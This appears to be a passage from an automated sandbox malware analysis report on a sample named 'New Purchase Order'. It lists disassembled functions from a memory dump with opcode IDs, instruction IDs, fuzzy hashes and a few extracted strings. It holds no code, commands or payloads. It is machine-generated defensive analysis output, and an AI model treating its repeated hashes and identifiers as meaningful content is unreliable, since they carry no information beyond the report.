                                                          • Opcode Fuzzy Hash: cb12134824265f92552d0c69b60aea3e9489af865d2a80d054a165c48ec32d61
                                                          • Instruction Fuzzy Hash: 46916171940619AFEF21DB99CC85FAEFBB8EF18B50F100065F600AB199D774AD04CBA0
                                                          Function 0179E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: cd49753d0cc16e1c97e4009bd66b6673c40f4116433d9c6561bf9ea6f064793e
                                                          • Instruction ID: c9e45d2cc328649b692e24e3141c68f6fa4e91876b801f35778015c0fd6831a3
                                                          • Opcode Fuzzy Hash: cd49753d0cc16e1c97e4009bd66b6673c40f4116433d9c6561bf9ea6f064793e
                                                          • Instruction Fuzzy Hash: DB919F72900609BEDF26EBA5EC48FAFFBB9EF85740F100069F501A7251EB359909CB51
                                                          Function 0172A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalTags
                                                          • API String ID: 0-1106856819
                                                          • Opcode ID: b25dcebb6acc0c2f9c1ffc94ee4aebb22aa3b05089c975331884d61e83c05608
                                                          • Instruction ID: cde2a49017e8dc8cf0343450887aa70c5b5689304430d67d9280b0acf142f943
                                                          • Opcode Fuzzy Hash: b25dcebb6acc0c2f9c1ffc94ee4aebb22aa3b05089c975331884d61e83c05608
                                                          • Instruction Fuzzy Hash: EB718CB5E0021A8FDF28CFACD490AADFBB6BF58710F54816EF905A7245E7349941CB50
                                                          Function 01794978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .mui
                                                          • API String ID: 0-1199573805
                                                          • Opcode ID: 112db825ad730d09ef0b0d717e2fe1d77bb071a877492cc3ac6b0d45f8d73185
                                                          • Instruction ID: e01df1924b8376c83e7e41b008d1c73d5bdad8042a99c236ce3900c7423447ef
                                                          • Opcode Fuzzy Hash: 112db825ad730d09ef0b0d717e2fe1d77bb071a877492cc3ac6b0d45f8d73185
                                                          • Instruction Fuzzy Hash: DC519672D012259BDF10DF99E944AAEFBB4EF09610F05416DEA12BB250D3385D06CBE4
                                                          Function 0170E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: EXT-
                                                          • API String ID: 0-1948896318
                                                          • Opcode ID: 61e3ae079a0019cd680db5483ead4eb3e20c0cb2a7d0471349890e48467e6fde
                                                          • Instruction ID: 2d8359d6334dc4d5404a48c14d6ba2ab2dd2e0906475dbed57ff028f929afae9
                                                          • Opcode Fuzzy Hash: 61e3ae079a0019cd680db5483ead4eb3e20c0cb2a7d0471349890e48467e6fde
                                                          • Instruction Fuzzy Hash: C1419072508302DBD722DA79C944B6BF7E8AF88B14F040D6DFA85D72C0EA74D904C796
                                                          Function 0176C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryHash
                                                          • API String ID: 0-2202222882
                                                          • Opcode ID: 611d707c1825256a28569cad8ee1dfab86da1ed3fe898f21852de019e2883a4a
                                                          • Instruction ID: 8fcc9297968a2df537f9dc800352df5f858f8b28c47f139a30307f648511ae16
                                                          • Opcode Fuzzy Hash: 611d707c1825256a28569cad8ee1dfab86da1ed3fe898f21852de019e2883a4a
                                                          • Instruction Fuzzy Hash: 0A4163B1D0022EAFDB21DA50CC84FDEF77CAB44714F0045A5EB48AB145DB709E898FA4
                                                          Function 01786B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: 102e366e92376a679e516fa5104f401d29212aabdb01576806c20f77507476b2
                                                          • Instruction ID: c09fc8212ecdad2d173f80de9ba4a363d480b24186445200928d322af53e78ad
                                                          • Opcode Fuzzy Hash: 102e366e92376a679e516fa5104f401d29212aabdb01576806c20f77507476b2
                                                          • Instruction Fuzzy Hash: 73310731A40719ABEB22EF69C854BEEFBF9EF45704F144068F941AB282D775E805CB50
                                                          Function 0176CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BinaryName
                                                          • API String ID: 0-215506332
                                                          • Opcode ID: 782341ccd2518bbee062603c86161dffaff197b3fc9167a060ca22a838599032
                                                          • Instruction ID: dde37586112a1e6b0c9fca1a6785f0216a4c8ad833bd15a65e9af7aefb713cb7
                                                          • Opcode Fuzzy Hash: 782341ccd2518bbee062603c86161dffaff197b3fc9167a060ca22a838599032
                                                          • Instruction Fuzzy Hash: 52310536900515AFEB17DB58C845E7FFB78EB80710F014169AD49A7291D7309E04EBE0
                                                          Function 0177892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0177895E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: e99101d8c1aff9dda7aa4f856f29c9ab7c9cc1889173bfbca4cd2e8f6f835bf5
                                                          • Instruction ID: 55bcab1eca41180fb57f3564e7585fa39aa9de30c75dbff81aa3d613fc6c136c
                                                          • Opcode Fuzzy Hash: e99101d8c1aff9dda7aa4f856f29c9ab7c9cc1889173bfbca4cd2e8f6f835bf5
                                                          • Instruction Fuzzy Hash: 9D0120763052059BDF205B55DC8CE56FFE9EF85268F04002CF7810E551CB206C40CB97
                                                          Function 01792000 Relevance: .8, Instructions: 757COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ea20113506bd6307306b246a908d935d2fc6dc0f98cd134cbcd519d8375f5b8
                                                          • Instruction ID: 6f9dec79816e9addb76176f8699d5bc057014cd93ce15c819d6adc570bb18cc0
                                                          • Opcode Fuzzy Hash: 6ea20113506bd6307306b246a908d935d2fc6dc0f98cd134cbcd519d8375f5b8
                                                          • Instruction Fuzzy Hash: 8742C671648341ABDF25EF68D890A6FFBE5BF88300F14092DFA8297252D771D849CB52
                                                          Function 01788158 Relevance: .6, Instructions: 617COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e48c5dafe018f851fcafcfa05b4cc8d9b6c366bcda9b603bed96bc28adaa3ff1
                                                          • Instruction ID: 84826c48e13129953985fe8b6529926b0d37529bdca3945d07ac9155e1bd082a
                                                          • Opcode Fuzzy Hash: e48c5dafe018f851fcafcfa05b4cc8d9b6c366bcda9b603bed96bc28adaa3ff1
                                                          • Instruction Fuzzy Hash: F2427C75A502198FEB24DF69C881BADFBF5BF48300F588199E948EB242D7349D81CF61
                                                          Function 01702840 Relevance: .6, Instructions: 605COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb01c776c1dfb2e345f228147e40132e4acc2e5d266a98d869fc682a83fb7a47
                                                          • Instruction ID: 9ffa8918aff8f4746157defd815bf3754657ee19d57225f4ce144d0f82749d85
                                                          • Opcode Fuzzy Hash: bb01c776c1dfb2e345f228147e40132e4acc2e5d266a98d869fc682a83fb7a47
                                                          • Instruction Fuzzy Hash: 0E320F70A007598FEB65CF69C8487BEFBF2BF84304F64411DE9869B285D7B5A842CB50
                                                          Function 0179A118 Relevance: .6, Instructions: 591COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d65de6832240303026df6badba8dbcd1a0a84f522223dc50f42ab317a307bd9b
                                                          • Instruction ID: 938ffcd636a3aa497a08f651394a40f81e223ec59a072b6180364058f569bdf4
                                                          • Opcode Fuzzy Hash: d65de6832240303026df6badba8dbcd1a0a84f522223dc50f42ab317a307bd9b
                                                          • Instruction Fuzzy Hash: F322F3702066618FEF25CF2DE095776FBF1AF44304F18849AD9868F286E735E45ACB60
                                                          Function 016F6A50 Relevance: .5, Instructions: 548COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a52a2327ad9d1f0b8be85f6c4cc8d6166cdc171d34c3c010d64340d69207b960
                                                          • Instruction ID: f64fc29756969615e28a5f67c9ff1f25a602c5454b85d877e6c0ec3af5f67838
                                                          • Opcode Fuzzy Hash: a52a2327ad9d1f0b8be85f6c4cc8d6166cdc171d34c3c010d64340d69207b960
                                                          • Instruction Fuzzy Hash: F4328C71A04215CFDB65CF68C880BAABBF1FF48310F14856DEA56AB396D774E841CB90
                                                          Function 01714A35 Relevance: .4, Instructions: 423COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction ID: 0c5b1f01eb5ee3bd1945455b7f3a983adfbf18200cf78f0c0cf1e915eaeb496a
                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                          • Instruction Fuzzy Hash: B5F16E71E0021A9BDF15CFADC594AAEFBF6BF48710F048129E946AB348E774E841CB50
                                                          Function 0178892B Relevance: .4, Instructions: 386COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7260c37d6684b3a9af167a2b2715bc449dfbbdefc01bef7775aa8f1c8e8cedf
                                                          • Instruction ID: e3f21f066248910f783f9eb5b6b77a855324e7160a2c294b506cba3c397fafba
                                                          • Opcode Fuzzy Hash: f7260c37d6684b3a9af167a2b2715bc449dfbbdefc01bef7775aa8f1c8e8cedf
                                                          • Instruction Fuzzy Hash: 34D11371A4060A8BDF15DF98C840AFEFBF1AF88304F5881A9D855E7281D735EA01CB61
                                                          Function 016F65D0 Relevance: .4, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 531198b29e750ae18d2b38ef2f44bb9918a2d5df44a3bc55864a137a6da8105b
                                                          • Instruction ID: 34d45226aeed19591a7a3bf3dba207ebde1c0457ae79e634ffb9d64c93aa7b00
                                                          • Opcode Fuzzy Hash: 531198b29e750ae18d2b38ef2f44bb9918a2d5df44a3bc55864a137a6da8105b
                                                          • Instruction Fuzzy Hash: 04E18071608342CFC715CF28C494A6ABBE1FF89314F158A6DFA9587351D731E905CB92
                                                          Function 016E8397 Relevance: .4, Instructions: 380COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be902c7b1afdcee0e7c8af70fad78a1873332142a7fa326ae46f102d66d8803b
                                                          • Instruction ID: fb6159ba0541ce8eb12c8f2f55e2cd72c369edfd441b7c7ff9686b6781af6bb6
                                                          • Opcode Fuzzy Hash: be902c7b1afdcee0e7c8af70fad78a1873332142a7fa326ae46f102d66d8803b
                                                          • Instruction Fuzzy Hash: CDD1BD71A0220A9BDB14DF68CC94ABEB7E9AF54304F15462DE916DB280EB34ED51CB90
                                                          Function 01778243 Relevance: .3, Instructions: 322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: 0e28f938f080a1b72151aecfda8a84f19c57f2c45b0846f62cdb4005c53d829e
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: A9B17F75B00609AFDF24DF99C948FABFBB9BF84304F10446DAA0297794DA34E945CB11
                                                          Function 01700535 Relevance: .3, Instructions: 300COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: d3391e603ef1124274ac9bcc95be4f76bacec6c01782430d55b7f5db92b670e6
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: C7B11531600746EFDB26DB68C854BBEFBF6AF84310F280199E956972C5EB70E941CB50
                                                          Function 016F83C0 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94fd30b78272eb31b16d7849f73d810b50ac03400f3a740141e1ad2f9378bb7b
                                                          • Instruction ID: 8d242036a4b41108590d4826c5bfcbc1a087a74f59e1b7b14fe397a557097c0e
                                                          • Opcode Fuzzy Hash: 94fd30b78272eb31b16d7849f73d810b50ac03400f3a740141e1ad2f9378bb7b
                                                          • Instruction Fuzzy Hash: ECC158742083418FD764CF19C894BAAB7E9BF88304F44495DEA8987391D7B5E909CF92
                                                          Function 016EC427 Relevance: .3, Instructions: 280COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecdbe7c550af7525a2262bbdf64a8faca0d93f0ac021f4635232e80e0106dfae
                                                          • Instruction ID: 31190a210a6863a53295a28ac2f4b244ab271eda555aff84042d23ade77661a5
                                                          • Opcode Fuzzy Hash: ecdbe7c550af7525a2262bbdf64a8faca0d93f0ac021f4635232e80e0106dfae
                                                          • Instruction Fuzzy Hash: 40B17170A002668BDB34CF58CC94BAAB7F1EF44700F0486E9D54AE7285EB309D86CF25
                                                          Function 0171E5E7 Relevance: .3, Instructions: 278COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b4b662deb2043eed61325f52d2b61b6e5bbe5b7fc54df25dba49dc02febdc4e
                                                          • Instruction ID: 4c747bf23cdcf4a9f11d3e0d5cb93f4b16b8175d9f6d26212fdda0a936c4d82c
                                                          • Opcode Fuzzy Hash: 5b4b662deb2043eed61325f52d2b61b6e5bbe5b7fc54df25dba49dc02febdc4e
                                                          • Instruction Fuzzy Hash: FCA10531E006599FEB22DB6CC848FAEFBB4AB05714F150165EE01AB2D5DBB49D40CBD1
                                                          Function 01730185 Relevance: .3, Instructions: 276COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fd38a51b66695f1e474cbd8aeb6db6570a0d711bfbfb4b8c8f24454b09d12f5
                                                          • Instruction ID: 25aa4d6da543697965f5c3b6d955851f4329699613b0422d655580b9023fb597
                                                          • Opcode Fuzzy Hash: 5fd38a51b66695f1e474cbd8aeb6db6570a0d711bfbfb4b8c8f24454b09d12f5
                                                          • Instruction Fuzzy Hash: 84A1CF70B0171A9FDB25CF69C890BAAF7B5FF84318F144029EA4597283EB34E911CB90
                                                          Function 017C4500 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 327ec0ab317b553d91bdd57d7fa3169badceb9f2ce30efbfb9339894e60917c0
                                                          • Instruction ID: 448193837feb7883eff1f334081b02d8bfacf4d180603ce6fb837296d49f4906
                                                          • Opcode Fuzzy Hash: 327ec0ab317b553d91bdd57d7fa3169badceb9f2ce30efbfb9339894e60917c0
                                                          • Instruction Fuzzy Hash: ECA1A972A04612EFD722DF18C994B6AFBE9FB58B04F15492CF5869B691D334E800CB91
                                                          Function 017C2B57 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction ID: 9a158814471e3cd17d2f66dca0b9580c503569bfd20dd0a5f60622571e943532
                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction Fuzzy Hash: 8EB13771E0061ADFDB29CFA9C880AADFBB5BF58B10F14816DE914A7356D730A941CF90
                                                          Function 017760E0 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6afa6dbbb9f1e931e79930c59f7a236035b0f99011d0c3a46c61fb92498f2ce
                                                          • Instruction ID: fe2a4cd8241fe3232caf87b6338fadaa17a61ced03ff9d3038995aaadddb07ad
                                                          • Opcode Fuzzy Hash: d6afa6dbbb9f1e931e79930c59f7a236035b0f99011d0c3a46c61fb92498f2ce
                                                          • Instruction Fuzzy Hash: B6916171E04616AFEF15CFA8D884BBEFBB5AB48710F154169F610AB249D734E900DBA0
                                                          Function 0170E3F0 Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f43be5a6abaefc61bbe5238fc711340e17a9de7862451fa8a5420e21017f376f
                                                          • Instruction ID: 6fce1283c818662234050a91bcdcaac8344d6fb40f25a106eef1e87df3e8ea27
                                                          • Opcode Fuzzy Hash: f43be5a6abaefc61bbe5238fc711340e17a9de7862451fa8a5420e21017f376f
                                                          • Instruction Fuzzy Hash: 0B913372A00312CBDB269B28C844B7EFBF1EB94714F1548A9FE059B2C5EB74D941CB51
                                                          Function 01746ACC Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1e91d3c09f9a8f7c695697da434b4092c68acee60cdd5ece4eb8a086560f213
                                                          • Instruction ID: a7f3b80a4ad77a6e12733998f57bccc664c4c0eeda4a42de6fcb4a01c4a50038
                                                          • Opcode Fuzzy Hash: b1e91d3c09f9a8f7c695697da434b4092c68acee60cdd5ece4eb8a086560f213
                                                          • Instruction Fuzzy Hash: 3E819271A0061A9FDB28CF69D940ABEFBF9FB48700F14852EE455D7641E334E940CBA4
                                                          Function 017BAB40 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction ID: 7736563f89543db7afb226bfd0579cac5d70c3a12892299f40dbf519efaf8c25
                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction Fuzzy Hash: 09816D71A0020A9FDF19DF98C8D4BEEFBB6AF84310F188569D9169B349DB34E941CB50
                                                          Function 0172E284 Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19a602aca8afc1723ca1f8dc1982da40aaf457f4f0a4e3f906875ac53b6a7584
                                                          • Instruction ID: 550afb9aaa89f1b43ab8eb7d5069e48328f51f8a7d81f6d71ce9f92fb39a3984
                                                          • Opcode Fuzzy Hash: 19a602aca8afc1723ca1f8dc1982da40aaf457f4f0a4e3f906875ac53b6a7584
                                                          • Instruction Fuzzy Hash: 31814071900619EFDB25CFA9C880AEEFBF9FF88354F144429E556A7251DB30AC46CB60
                                                          Function 0170C640 Relevance: .2, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f90ac15501b8aeb3bda872f936592ae7c09e36e480e6b393099563dbdef5c4c9
                                                          • Instruction ID: 99539218e9887452791c9a0d035ab6e4784d9356c5ec0919ff6d74f6561d9afc
                                                          • Opcode Fuzzy Hash: f90ac15501b8aeb3bda872f936592ae7c09e36e480e6b393099563dbdef5c4c9
                                                          • Instruction Fuzzy Hash: 6371AB75904629DBCB268F59C8907BEFBF5FF5C710F14829AE942AB390D7749840CBA0
                                                          Function 017A47A0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
